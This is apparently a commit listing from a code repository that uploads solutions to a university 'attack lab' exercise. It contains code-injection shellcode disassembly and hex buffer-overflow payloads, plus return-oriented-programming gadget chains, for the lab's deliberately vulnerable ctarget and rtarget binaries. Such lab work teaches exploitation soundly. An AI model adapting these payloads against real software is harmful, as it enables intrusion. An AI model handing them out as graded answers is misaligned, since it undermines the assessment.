Compare commits

..

2 Commits

Author SHA1 Message Date
6d351b29f1 upload attacklab 2025-08-20 02:09:39 +08:00
0e11e8b2a4 rename 2025-08-20 02:07:32 +08:00
10 changed files with 12186 additions and 0 deletions

10
attack/c_level2.s Normal file
View File

@ -0,0 +1,10 @@
level2.o elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0: bf fa 97 b9 59 mov $0x59b997fa,%edi
5: 68 ec 17 40 00 push $0x4017ec
a: c3 ret

6
attack/c_level2_hex.txt Normal file
View File

@ -0,0 +1,6 @@
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
BF FA 97 B9 59 68 EC 17
40 00 C3 00 00 00 00 00
90 DC 61 55 00 00 00 00

10
attack/c_level3.s Normal file
View File

@ -0,0 +1,10 @@
level3.o elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0: 48 c7 c7 a8 dc 61 55 mov $0x5561dca8,%rdi
7: 68 fa 18 40 00 push $0x4018fa
c: c3 ret

7
attack/c_level3_hex.txt Normal file
View File

@ -0,0 +1,7 @@
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
48 C7 C7 A8 DC 61 55 68
FA 18 40 00 C3 00 00 00
90 DC 61 55 00 00 00 00
35 39 62 39 39 37 66 61

5922
attack/ctarget.s Normal file

File diff suppressed because it is too large Load Diff

6
attack/level1_hex.txt Normal file
View File

@ -0,0 +1,6 @@
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
C0 17 40 00 00 00 00 00

9
attack/r_level2_hex.txt Normal file
View File

@ -0,0 +1,9 @@
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
CC 19 40 00 00 00 00 00
FA 97 B9 59 00 00 00 00
C6 19 40 00 00 00 00 00
EC 17 40 00 00 00 00 00

16
attack/r_level3_hex.txt Normal file
View File

@ -0,0 +1,16 @@
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
06 1A 40 00 00 00 00 00
C5 19 40 00 00 00 00 00
CC 19 40 00 00 00 00 00
48 00 00 00 00 00 00 00
DD 19 40 00 00 00 00 00
34 1A 40 00 00 00 00 00
13 1A 40 00 00 00 00 00
D6 19 40 00 00 00 00 00
C5 19 40 00 00 00 00 00
FA 18 40 00 00 00 00 00
35 39 62 39 39 37 66 61

6200
attack/rtarget.s Normal file

File diff suppressed because it is too large Load Diff